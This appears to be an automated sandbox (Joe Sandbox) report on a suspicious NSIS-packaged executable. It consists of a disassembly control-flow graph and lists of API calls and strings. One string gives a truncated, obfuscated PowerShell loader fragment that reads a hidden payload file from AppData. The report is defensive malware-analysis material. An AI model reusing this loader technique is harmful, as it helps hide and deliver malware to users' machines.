2729->2722 2730->2722 2731->2722 2732->2722 2733->2722 2734->2722 2735 405f02 SHGetPathFromIDListW CoTaskMemFree 2734->2735 2735->2722 2742 405fe7 2736->2742 2737 40605d 2738 406062 CharPrevW 2737->2738 2741 406083 2737->2741 2738->2737 2739 406050 CharNextW 2739->2737 2739->2742 2741->2675 2742->2737 2742->2739 2743 40603c CharNextW 2742->2743 2744 40604b CharNextW 2742->2744 2753 4057db 2742->2753 2743->2742 2744->2739 2746 405c87 2745->2746 2747 405c47 RegQueryValueExW 2745->2747 2746->2722 2748 405c68 RegCloseKey 2747->2748 2748->2746 2750->2722 2751->2722 2752->2720 2754 4057e1 2753->2754 2755 4057f7 2754->2755 2756 4057e8 CharNextW 2754->2756 2755->2742 2756->2754 2807 405d46 lstrcpynW 2757->2807 2759 4058c7 2808 405859 CharNextW CharNextW 2759->2808 2762 4055f5 2762->2680 2762->2681 2763 405fda 5 API calls 2769 4058dd 2763->2769 2764 40590e lstrlenW 2765 405919 2764->2765 2764->2769 2767 4057ae 3 API calls 2765->2767 2766 406089 2 API calls 2766->2769 2768 40591e GetFileAttributesW 2767->2768 2768->2762 2769->2762 2769->2764 2769->2766 2770 4057fa 2 API calls 2769->2770 2770->2764 2771->2685 2773 405808 2772->2773 2774 40581a 2773->2774 2775 40580e CharPrevW 2773->2775 2774->2689 2775->2773 2775->2774 2776->2716 2814 4059aa GetFileAttributesW 2777->2814 2780 4055ba 2780->2716 2781 4055b0 DeleteFileW 2783 4055b6 2781->2783 2782 4055a8 RemoveDirectoryW 2782->2783 2783->2780 2784 4055c6 SetFileAttributesW 2783->2784 2784->2780 2786 4050b7 2785->2786 2788 405015 2785->2788 2786->2716 2787 405031 lstrlenW 2790 40505a 2787->2790 2791 40503f lstrlenW 2787->2791 2788->2787 2789 405d68 18 API calls 2788->2789 2789->2787 2793 405060 SetWindowTextW 2790->2793 2794 40506d 2790->2794 2791->2786 2792 405051 lstrcatW 2791->2792 2792->2790 2793->2794 2794->2786 2795 405073 SendMessageW SendMessageW SendMessageW 2794->2795 2795->2786 2817 4060b0 GetModuleHandleA 2796->2817 2800 405c08 2800->2716 2802 40576f 2801->2802 2803 40609f FindClose 2801->2803 2802->2682 2802->2694 2803->2802 2805 405779 2804->2805 2806 4057ca lstrcatW 2804->2806 2805->2700 2806->2805 2807->2759 2809 405876 2808->2809 2812 405888 2808->2812 2811 405883 CharNextW 2809->2811 2809->2812 2810 4058ac 2810->2762 2810->2763 2811->2810 2812->2810 2813 4057db CharNextW 2812->2813 2813->2812 2815 405599 2814->2815 2816 4059bc SetFileAttributesW 2814->2816 2815->2780 2815->2781 2815->2782 2816->2815 2818 4060d7 GetProcAddress 2817->2818 2819 4060cc LoadLibraryA 2817->2819 2820 405be7 2818->2820 2819->2818 2819->2820 2820->2800 2821 405a52 lstrcpyW 2820->2821 2822 405aa1 GetShortPathNameW 2821->2822 2823 405a7b 2821->2823 2824 405ab6 2822->2824 2825 405bda 2822->2825 2845 4059cf GetFileAttributesW CreateFileW 2823->2845 2824->2825 2827 405abe wsprintfA 2824->2827 2825->2800 2829 405d68 18 API calls 2827->2829 2828 405a85 CloseHandle GetShortPathNameW 2828->2825 2830 405a99 2828->2830 2831 405ae6 2829->2831 2830->2822 2830->2825 2846 4059cf GetFileAttributesW CreateFileW 2831->2846 2833 405af3 2833->2825 2834 405b02 GetFileSize GlobalAlloc 2833->2834 2835 405bd3 CloseHandle 2834->2835 2836 405b24 ReadFile 2834->2836 2835->2825 2836->2835 2837 405b3c 2836->2837 2837->2835 2847 405934 lstrlenA 2837->2847 2840 405b55 lstrcpyA 2843 405b77 2840->2843 2841 405b69 2842 405934 4 API calls 2841->2842 2842->2843 2844 405bae SetFilePointer WriteFile GlobalFree 2843->2844 2844->2835 2845->2828 2846->2833 2848 405975 lstrlenA 2847->2848 2849 40594e lstrcmpiA 2848->2849 2851 40597d 2848->2851 2850 40596c CharNextA 2849->2850 2849->2851 2850->2848 2851->2840 2851->2841 3935 4040a9 lstrcpynW lstrlenW 3936 401cab 3937 402ab3 18 API calls 3936->3937 3938 401cb2 3937->3938 3939 402ab3 18 API calls 3938->3939 3940 401cba GetDlgItem 3939->3940 3941 4024e6 3940->3941 3942 40232f 3943 402335 3942->3943 3944 402ad0 18 API calls 3943->3944 3945 402347 3944->3945 3946 402ad0 18 API calls 3945->3946 3947 402351 RegCreateKeyExW 3946->3947 3948 40237b 3947->3948 3949 402729 3947->3949 3950 402396 3948->3950 3951 402ad0 18 API calls 3948->3951 3952 4023a2 3950->3952 3954 402ab3 18 API calls 3950->3954 3953 40238c lstrlenW 3951->3953 3955 4023bd RegSetValueExW 3952->3955 3956 402f38 33 API calls 3952->3956 3953->3950 3954->3952 3957 4023d3 RegCloseKey 3955->3957 3956->3955 3957->3949 3959 4016af 3960 402ad0 18 API calls 3959->3960 3961 4016b5 GetFullPathNameW 3960->3961 3962 4016cf 3961->3962 3968 4016f1 3961->3968 3965 406089 2 API calls 3962->3965 3962->3968 3963 401706 GetShortPathNameW 3964 40295d 3963->3964 3966 4016e1 3965->3966 3966->3968 3969 405d46 lstrcpynW 3966->3969 3968->3963 3968->3964 3969->3968 3970 404430 3971 40445c 3970->3971 3972 40446d 3970->3972 4031 40550d GetDlgItemTextW 3971->4031 3974 404479 GetDlgItem 3972->3974 4007 4044d8 3972->4007 3976 40448d 3974->3976 3975 404467 3978 405fda 5 API calls 3975->3978 3980 4044a1 SetWindowTextW 3976->3980 3986 405859 4 API calls 3976->3986 3977 4045bc 3981 40475d 3977->3981 4033 40550d GetDlgItemTextW 3977->4033 3978->3972 3984 403f95 19 API calls 3980->3984 3985 403ffc 8 API calls 3981->3985 3982 405d68 18 API calls 3987 40454c SHBrowseForFolderW 3982->3987 3983 4045ec 3988 4058b6 18 API calls 3983->3988 3989 4044bd 3984->3989 3990 404771 3985->3990 3991 404497 3986->3991 3987->3977 3992 404564 CoTaskMemFree 3987->3992 3993 4045f2 3988->3993 3994 403f95 19 API calls 3989->3994 3991->3980 3997 4057ae 3 API calls 3991->3997 3995 4057ae 3 API calls 3992->3995 4034 405d46 lstrcpynW 3993->4034 3996 4044cb 3994->3996 3998 404571 3995->3998 4032 403fca SendMessageW 3996->4032 3997->3980 4001 4045a8 SetDlgItemTextW 3998->4001 4006 405d68 18 API calls 3998->4006 4001->3977 4002 4044d1 4004 4060b0 3 API calls 4002->4004 4003 404609 4005 4060b0 3 API calls 4003->4005 4004->4007 4014 404611 4005->4014 4008 404590 lstrcmpiW 4006->4008 4007->3977 4007->3981 4007->3982 4008->4001 4011 4045a1 lstrcatW 4008->4011 4009 404650 4035 405d46 lstrcpynW 4009->4035 4011->4001 4012 404657 4013 405859 4 API calls 4012->4013 4015 40465d GetDiskFreeSpaceW 4013->4015 4014->4009 4017 4057fa 2 API calls 4014->4017 4019 4046a2 4014->4019 4018 404680 MulDiv 4015->4018 4015->4019 4017->4014 4018->4019 4020 40470c 4019->4020 4021 4047de 21 API calls 4019->4021 4022 40472f 4020->4022 4024 40140b 2 API calls 4020->4024 4023 4046fe 4021->4023 4036 403fb7 KiUserCallbackDispatcher 4022->4036 4026 404703 4023->4026 4027 40470e SetDlgItemTextW 4023->4027 4024->4022 4029 4047de 21 API calls 4026->4029 4027->4020 4028 40474b 4028->3981 4037 4043c5 4028->4037 4029->4020 4031->3975 4032->4002 4033->3983 4034->4003 4035->4012 4036->4028 4038 4043d3 4037->4038 4039 4043d8 SendMessageW 4037->4039 4038->4039 4039->3981 4040 404132 4041 40414a 4040->4041 4048 404264 4040->4048 4045 403f95 19 API calls 4041->4045 4042 4042ce 4043 4043a0 4042->4043 4044 4042d8 GetDlgItem 4042->4044 4050 403ffc 8 API calls 4043->4050 4046 404361 4044->4046 4047 4042f2 4044->4047 4049 4041b1 4045->4049 4046->4043 4055 404373 4046->4055 4047->4046 4054 404318 6 API calls 4047->4054 4048->4042 4048->4043 4051 40429f GetDlgItem SendMessageW 4048->4051 4053 403f95 19 API calls 4049->4053 4062 40439b 4050->4062 4071 403fb7 KiUserCallbackDispatcher 4051->4071 4057 4041be CheckDlgButton 4053->4057 4054->4046 4058 404389 4055->4058 4059 404379 SendMessageW 4055->4059 4056 4042c9 4060 4043c5 SendMessageW 4056->4060 4069 403fb7 KiUserCallbackDispatcher 4057->4069 4058->4062 4063 40438f SendMessageW 4058->4063 4059->4058 4060->4042 4063->4062 4064 4041dc GetDlgItem 4070 403fca SendMessageW 4064->4070 4066 4041f2 SendMessageW 4067 404218 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4066->4067 4068 40420f GetSysColor 4066->4068 4067->4062 4068->4067 4069->4064 4070->4066 4071->4056 4072 402938 SendMessageW 4073 402952 InvalidateRect 4072->4073 4074 40295d 4072->4074 4073->4074 4075 4014b8 4076 4014be 4075->4076 4077 401389 2 API calls 4076->4077 4078 4014c6 4077->4078 2976 4015b9 2977 402ad0 18 API calls 2976->2977 2978 4015c0 2977->2978 2979 405859 4 API calls 2978->2979 2986 4015c9 2979->2986 2980 401614 2981 401646 2980->2981 2982 401619 2980->2982 2989 401423 25 API calls 2981->2989 2994 401423 2982->2994 2983 4057db CharNextW 2984 4015d7 CreateDirectoryW 2983->2984 2984->2986 2987 4015ed GetLastError 2984->2987 2986->2980 2986->2983 2987->2986 2990 4015fa GetFileAttributesW 2987->2990 2993 40163e 2989->2993 2990->2986 2992 40162d SetCurrentDirectoryW 2992->2993 2995 404ffa 25 API calls 2994->2995 2996 401431 2995->2996 2997 405d46 lstrcpynW 2996->2997 2997->2992 2998 405139 2999 4052e5 2998->2999 3000 40515a GetDlgItem GetDlgItem GetDlgItem 2998->3000 3001 4052ee GetDlgItem CreateThread CloseHandle 2999->3001 3003 405316 2999->3003 3044 403fca SendMessageW 3000->3044 3001->3003 3067 4050cd OleInitialize 3001->3067 3005 405363 3003->3005 3006 40532d ShowWindow ShowWindow 3003->3006 3007 405341 3003->3007 3004 4051cb 3009 4051d2 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3004->3009 3053 403ffc 3005->3053 3049 403fca SendMessageW 3006->3049 3008 40539f 3007->3008 3011 405352 3007->3011 3012 405378 ShowWindow 3007->3012 3008->3005 3016 4053aa SendMessageW 3008->3016 3014 405241 3009->3014 3015 405225 SendMessageW SendMessageW 3009->3015 3050 403f6e 3011->3050 3019 405398 3012->3019 3020 40538a 3012->3020 3022 405254 3014->3022 3023 405246 SendMessageW 3014->3023 3015->3014 3018 405371 3016->3018 3024 4053c3 CreatePopupMenu 3016->3024 3021 403f6e SendMessageW 3019->3021 3025 404ffa 25 API calls 3020->3025 3021->3008 3045 403f95 3022->3045 3023->3022 3026 405d68 18 API calls 3024->3026 3025->3019 3028 4053d3 AppendMenuW 3026->3028 3030 4053e6 GetWindowRect 3028->3030 3031 4053f9 3028->3031 3029 405264 3032 4052a1 GetDlgItem SendMessageW 3029->3032 3033 40526d ShowWindow 3029->3033 3034 405402 TrackPopupMenu 3030->3034 3031->3034 3032->3018 3037 4052c8 SendMessageW SendMessageW 3032->3037 3035 405290 3033->3035 3036 405283 ShowWindow 3033->3036 3034->3018 3038 405420 3034->3038 3048 403fca SendMessageW 3035->3048 3036->3035 3037->3018 3039 40543c SendMessageW 3038->3039 3039->3039 3041 405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3039->3041 3042 40547e SendMessageW 3041->3042 3042->3042 3043 4054a7 GlobalUnlock SetClipboardData CloseClipboard 3042->3043 3043->3018 3044->3004 3046 405d68 18 API calls 3045->3046 3047 403fa0 SetDlgItemTextW 3046->3047 3047->3029 3048->3032 3049->3007 3051 403f75 3050->3051 3052 403f7b SendMessageW 3050->3052 3051->3052 3052->3005 3054 40409d 3053->3054 3055 404014 GetWindowLongW 3053->3055 3054->3018 3055->3054 3056 404025 3055->3056 3057 404034 GetSysColor 3056->3057 3058 404037 3056->3058 3057->3058 3059 404047 SetBkMode 3058->3059 3060 40403d SetTextColor 3058->3060 3061 404065 3059->3061 3062 40405f GetSysColor 3059->3062 3060->3059 3063 404076 3061->3063 3064 40406c SetBkColor 3061->3064 3062->3061 3063->3054 3065 404090 CreateBrushIndirect 3063->3065 3066 404089 DeleteObject 3063->3066 3064->3063 3065->3054 3066->3065 3074 403fe1 3067->3074 3069 4050f0 3073 405117 3069->3073 3077 401389 3069->3077 3070 403fe1 SendMessageW 3071 405129 CoUninitialize 3070->3071 3073->3070 3075 403ff9 3074->3075 3076 403fea SendMessageW 3074->3076 3075->3069 3076->3075 3079 401390 3077->3079 3078 4013fe 3078->3069 3079->3078 3080 4013cb MulDiv SendMessageW 3079->3080 3080->3079 4079 401939 4080 402ad0 18 API calls 4079->4080 4081 401940 lstrlenW 4080->4081 4082 4024e6 4081->4082 4082->4082 3301 403abd 3302 403c10 3301->3302 3303 403ad5 3301->3303 3305 403c21 GetDlgItem GetDlgItem 3302->3305 3306 403c61 3302->3306 3303->3302 3304 403ae1 3303->3304 3307 403aec SetWindowPos 3304->3307 3308 403aff 3304->3308 3309 403f95 19 API calls 3305->3309 3310 403cbb 3306->3310 3315 401389 2 API calls 3306->3315 3307->3308 3312 403b04 ShowWindow 3308->3312 3313 403b1c 3308->3313 3314 403c4b SetClassLongW 3309->3314 3311 403fe1 SendMessageW 3310->3311 3316 403c0b 3310->3316 3342 403ccd 3311->3342 3312->3313 3317 403b24 DestroyWindow 3313->3317 3318 403b3e 3313->3318 3319 40140b 2 API calls 3314->3319 3320 403c93 3315->3320 3321 403f1e 3317->3321 3322 403b43 SetWindowLongW 3318->3322 3323 403b54 3318->3323 3319->3306 3320->3310 3324 403c97 SendMessageW 3320->3324 3321->3316 3332 403f4f ShowWindow 3321->3332 3322->3316 3327 403b60 GetDlgItem 3323->3327 3328 403bfd 3323->3328 3324->3316 3325 40140b 2 API calls 3325->3342 3326 403f20 DestroyWindow EndDialog 3326->3321 3329 403b90 3327->3329 3330 403b73 SendMessageW IsWindowEnabled 3327->3330 3331 403ffc 8 API calls 3328->3331 3334 403b9d 3329->3334 3335 403be4 SendMessageW 3329->3335 3336 403bb0 3329->3336 3346 403b95 3329->3346 3330->3316 3330->3329 3331->3316 3332->3316 3333 405d68 18 API calls 3333->3342 3334->3335 3334->3346 3335->3328 3339 403bb8 3336->3339 3340 403bcd 3336->3340 3337 403f6e SendMessageW 3341 403bcb 3337->3341 3338 403f95 19 API calls 3338->3342 3344 40140b 2 API calls 3339->3344 3343 40140b 2 API calls 3340->3343 3341->3328 3342->3316 3342->3325 3342->3326 3342->3333 3342->3338 3347 403f95 19 API calls 3342->3347 3362 403e60 DestroyWindow 3342->3362 3345 403bd4 3343->3345 3344->3346 3345->3328 3345->3346 3346->3337 3348 403d48 GetDlgItem 3347->3348 3349 403d65 ShowWindow KiUserCallbackDispatcher 3348->3349 3350 403d5d 3348->3350 3371 403fb7 KiUserCallbackDispatcher 3349->3371 3350->3349 3352 403d8f EnableWindow 3355 403da3 3352->3355 3353 403da8 GetSystemMenu EnableMenuItem SendMessageW 3354 403dd8 SendMessageW 3353->3354 3353->3355 3354->3355 3355->3353 3372 403fca SendMessageW 3355->3372 3373 405d46 lstrcpynW 3355->3373 3358 403e06 lstrlenW 3359 405d68 18 API calls 3358->3359 3360 403e1c SetWindowTextW 3359->3360 3361 401389 2 API calls 3360->3361 3361->3342 3362->3321 3363 403e7a CreateDialogParamW 3362->3363 3363->3321 3364 403ead 3363->3364 3365 403f95 19 API calls 3364->3365 3366 403eb8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3365->3366 3367 401389 2 API calls 3366->3367 3368 403efe 3367->3368 3368->3316 3369 403f06 ShowWindow 3368->3369 3370 403fe1 SendMessageW 3369->3370 3370->3321 3371->3352 3372->3355 3373->3358 3390 40173f 3391 402ad0 18 API calls 3390->3391 3392 401746 3391->3392 3393 4059fe 2 API calls 3392->3393 3394 40174d 3393->3394 3395 4059fe 2 API calls 3394->3395 3395->3394 4083 4026bf 4084 4026c6 4083->4084 4085 40295d 4083->4085 4086 4026cc FindClose 4084->4086 4086->4085

                                                            Executed Functions

                                                            Function 004031DD Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335stringfilecomCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 4031dd-403273 #17 SetErrorMode OleInitialize call 4060b0 SHGetFileInfoW call 405d46 GetCommandLineW call 405d46 GetModuleHandleW 7 403275-40327c 0->7 8 40327d-40328f call 4057db CharNextW 0->8 7->8 11 403358-40335e 8->11 12 403294-40329a 11->12 13 403364 11->13 14 4032a3-4032a9 12->14 15 40329c-4032a1 12->15 16 403378-403392 GetTempPathW call 4031a9 13->16 17 4032b0-4032b4 14->17 18 4032ab-4032af 14->18 15->14 15->15 26 403394-4033b2 GetWindowsDirectoryW lstrcatW call 4031a9 16->26 27 4033ea-403404 DeleteFileW call 402cff 16->27 20 403349-403354 call 4057db 17->20 21 4032ba-4032c0 17->21 18->17 20->11 35 403356-403357 20->35 24 4032c2-4032c9 21->24 25 4032d5-4032ec 21->25 30 4032d0 24->30 31 4032cb-4032ce 24->31 32 40331a-403330 25->32 33 4032ee-403304 25->33 26->27 44 4033b4-4033e4 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4031a9 26->44 40 40349a-4034a9 call 403640 OleUninitialize 27->40 41 40340a-403410 27->41 30->25 31->25 31->30 32->20 39 403332-403347 32->39 33->32 37 403306-40330e 33->37 35->11 42 403310-403313 37->42 43 403315 37->43 39->20 45 403366-403373 call 405d46 39->45 57 4035a5-4035ab 40->57 58 4034af-4034bf call 405529 ExitProcess 40->58 46 403412-40341d call 4057db 41->46 47 40348a-403491 call 40371a 41->47 42->32 42->43 43->32 44->27 44->40 45->16 61 403454-40345e 46->61 62 40341f-403430 46->62 56 403496 47->56 56->40 59 403628-403630 57->59 60 4035ad-4035ca call 4060b0 * 3 57->60 66 403632 59->66 67 403636-40363a ExitProcess 59->67 92 403614-40361f ExitWindowsEx 60->92 93 4035cc-4035ce 60->93 68 403460-40346e call 4058b6 61->68 69 4034c5-4034df lstrcatW lstrcmpiW 61->69 65 403432-403434 62->65 72 403436-40344c 65->72 73 40344e-403452 65->73 66->67 68->40 83 403470-403486 call 405d46 * 2 68->83 69->40 75 4034e1-4034f7 CreateDirectoryW SetCurrentDirectoryW 69->75 72->61 72->73 73->61 73->65 78 403504-40352d call 405d46 75->78 79 4034f9-4034ff call 405d46 75->79 88 403532-40354e call 405d68 DeleteFileW 78->88 79->78 83->47 98 403550-403560 CopyFileW 88->98 99 40358f-403597 88->99 92->59 96 403621-403623 call 40140b 92->96 93->92 97 4035d0-4035d2 93->97 96->59 97->92 101 4035d4-4035e6 GetCurrentProcess 97->101 98->99 103 403562-403582 call 405be0 call 405d68 call 4054c8 98->103 99->88 102 403599-4035a0 call 405be0 99->102 101->92 107 4035e8-40360a 101->107 102->40 103->99 115 403584-40358b CloseHandle 103->115 107->92 115->99
                                                            APIs
                                                            • #17.COMCTL32 ref: 004031FC
                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403207
                                                            • OleInitialize.OLE32(00000000), ref: 0040320E
                                                              • Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                              • Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                              • Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                            • SHGetFileInfoW.SHELL32(0042B1B8,00000000,?,000002B4,00000000), ref: 00403236
                                                              • Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53
                                                            • GetCommandLineW.KERNEL32(00433EA0,NSIS Error), ref: 0040324B
                                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\YrCSUX2O3I.exe",00000000), ref: 0040325E
                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\YrCSUX2O3I.exe",00000020), ref: 00403285
                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403389
                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040339A
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033A6
                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033BA
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033C2
                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033D3
                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                                            • DeleteFileW.KERNELBASE(1033), ref: 004033EF
                                                            • OleUninitialize.OLE32(?), ref: 0040349F
                                                            • ExitProcess.KERNEL32 ref: 004034BF
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\YrCSUX2O3I.exe",00000000,?), ref: 004034CB
                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\YrCSUX2O3I.exe",00000000,?), ref: 004034D7
                                                            • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034E3
                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004034EA
                                                            • DeleteFileW.KERNEL32(0042A9B8,0042A9B8,?,"$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(286,?), ref: 00403544
                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\YrCSUX2O3I.exe,0042A9B8,00000001), ref: 00403558
                                                            • CloseHandle.KERNEL32(00000000,0042A9B8,0042A9B8,?,0042A9B8,00000000), ref: 00403585
                                                            • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 004035DB
                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403617
                                                            • ExitProcess.KERNEL32 ref: 0040363A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                            • String ID: "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(286$"C:\Users\user\Desktop\YrCSUX2O3I.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens$C:\Users\user\Desktop$C:\Users\user\Desktop\YrCSUX2O3I.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                            • API String ID: 4107622049-1391743483
                                                            • Opcode ID: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
                                                            • Instruction ID: c3dce8018812ee6b76f8874dd062ed99eac1b1b1f1b1a27a2229326af738bb6a
                                                            • Opcode Fuzzy Hash: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
                                                            • Instruction Fuzzy Hash: 21B1C230500311AAD720BF619D49A2B3EACEF45746F11443FF442BA2E1DBBD9A45CB6E
                                                            Function 00405139 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282windowclipboardmemoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 116 405139-405154 117 4052e5-4052ec 116->117 118 40515a-405223 GetDlgItem * 3 call 403fca call 404897 GetClientRect GetSystemMetrics SendMessageW * 2 116->118 119 405316-405323 117->119 120 4052ee-405310 GetDlgItem CreateThread CloseHandle 117->120 136 405241-405244 118->136 137 405225-40523f SendMessageW * 2 118->137 123 405341-405348 119->123 124 405325-40532b 119->124 120->119 128 40534a-405350 123->128 129 40539f-4053a3 123->129 126 405363-40536c call 403ffc 124->126 127 40532d-40533c ShowWindow * 2 call 403fca 124->127 140 405371-405375 126->140 127->123 133 405352-40535e call 403f6e 128->133 134 405378-405388 ShowWindow 128->134 129->126 131 4053a5-4053a8 129->131 131->126 138 4053aa-4053bd SendMessageW 131->138 133->126 141 405398-40539a call 403f6e 134->141 142 40538a-405393 call 404ffa 134->142 144 405254-40526b call 403f95 136->144 145 405246-405252 SendMessageW 136->145 137->136 146 4054c1-4054c3 138->146 147 4053c3-4053e4 CreatePopupMenu call 405d68 AppendMenuW 138->147 141->129 142->141 155 4052a1-4052c2 GetDlgItem SendMessageW 144->155 156 40526d-405281 ShowWindow 144->156 145->144 146->140 153 4053e6-4053f7 GetWindowRect 147->153 154 4053f9-4053ff 147->154 157 405402-40541a TrackPopupMenu 153->157 154->157 155->146 160 4052c8-4052e0 SendMessageW * 2 155->160 158 405290 156->158 159 405283-40528e ShowWindow 156->159 157->146 161 405420-405437 157->161 162 405296-40529c call 403fca 158->162 159->162 160->146 163 40543c-405457 SendMessageW 161->163 162->155 163->163 165 405459-40547c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 163->165 166 40547e-4054a5 SendMessageW 165->166 166->166 167 4054a7-4054bb GlobalUnlock SetClipboardData CloseClipboard 166->167 167->146
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000403), ref: 00405198
                                                            • GetDlgItem.USER32(?,000003EE), ref: 004051A7
                                                            • GetClientRect.USER32(?,?), ref: 004051E4
                                                            • GetSystemMetrics.USER32(00000015), ref: 004051EC
                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 0040520D
                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040521E
                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405231
                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040523F
                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405252
                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405274
                                                            • ShowWindow.USER32(?,00000008), ref: 00405288
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052A9
                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004052B9
                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052D2
                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052DE
                                                            • GetDlgItem.USER32(?,000003F8), ref: 004051B6
                                                              • Part of subcall function 00403FCA: SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052FB
                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_000050CD,00000000), ref: 00405309
                                                            • CloseHandle.KERNELBASE(00000000), ref: 00405310
                                                            • ShowWindow.USER32(00000000), ref: 00405334
                                                            • ShowWindow.USER32(?,00000008), ref: 00405339
                                                            • ShowWindow.USER32(00000008), ref: 00405380
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B2
                                                            • CreatePopupMenu.USER32 ref: 004053C3
                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053D8
                                                            • GetWindowRect.USER32(?,?), ref: 004053EB
                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040540F
